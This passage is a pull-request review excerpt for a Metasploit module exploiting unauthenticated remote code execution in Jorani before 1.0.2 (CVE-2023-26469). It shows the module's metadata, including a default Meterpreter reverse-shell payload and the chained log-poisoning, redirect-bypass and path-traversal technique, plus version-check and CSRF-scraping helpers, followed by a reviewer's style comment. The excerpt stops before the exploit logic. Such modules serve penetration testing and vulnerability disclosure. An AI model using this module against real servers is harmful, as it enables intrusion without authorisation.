modules/exploits/multi/php/jorani_path_trav.rb

```diff
@@ -0,0 +1,171 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Jorani unauthenticated Remote Code Execution',
+        'Description' => %q{
+          This module exploits an unauthenticated Remote Code Execution in Jorani prior to 1.0.2.
+          It abuses 3 vulnerabilities: log poisoning and redirection bypass via header spoofing, then it uses path traversal to trigger the vulnerability.
+          It has been tested on Jorani 1.0.0.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'RIOUX Guilhem (jrjgjk)'
+        ],
+        'References' => [
+          ['CVE', '2023-26469'],
+          ['URL', 'https://github.com/Orange-Cyberdefense/CVE-repository/blob/master/PoCs/CVE_Jorani.py']
+        ],
+        'Platform' => %w[php],
+        'Arch' => ARCH_PHP,
+        'Targets' => [
+          ['Jorani < 1.0.2', {}]
+        ],
+        'DefaultOptions' => {
+          'PAYLOAD' => 'php/meterpreter/reverse_tcp',
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'DisclosureDate' => '2023-01-06',
+        'Privileged' => false,
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]
+        }
+      )
+    )
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base path of Jorani', '/'])
+      ]
+    )
+  end
+
+  def get_version(res)
+    matches = res.body.scan(/&nbsp;v([0-9.]+)&nbsp;&copy;/i)
+    if matches.nil? || matches[0].nil?
+      print_error('Cannot recovered Jorani version...')
+      return nil
+    end
+    matches[0][0]
+  end
+
+  def service_running(res)
+    matches = res.body.scan(/Leave Management System/)
+    if matches[0].nil?
+      print_error("Jorani doesn't appears to be running on the target")
+      return false
+    end
+    true
+  end
+
+  def recover_csrf(res)
+    matches = res.body.scan(/<input type="hidden" name="csrf_test_jorani" value="(.*?)"/)
+    return matches[0][0] if matches.length == 1 && matches[0].length == 1
+
+    nil
+  end
+
+  def check
+    # For the check command
+    print_status('Checking Jorani version')
+    uri = normalize_uri(target_uri.path, 'index.php')
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => "#{uri}/session/login"
+    )
+
+    if res.nil?
+      print_error('There was a problem accessing the login page')
+      return Exploit::CheckCode::Safe
```

Comment:
```suggestion
      return Exploit::CheckCode::Safe('There was a problem accessing the login page')
```
You may want to check out using the check code itself to give the specific information in a return rather than add a separate print statement.  Also, it's not something I think we really are hardcore about, but it is generally suggested that print statements in check methods be verbose, i.e. `vprint_status` or `vprint_error` if you choose to use a separate print statement.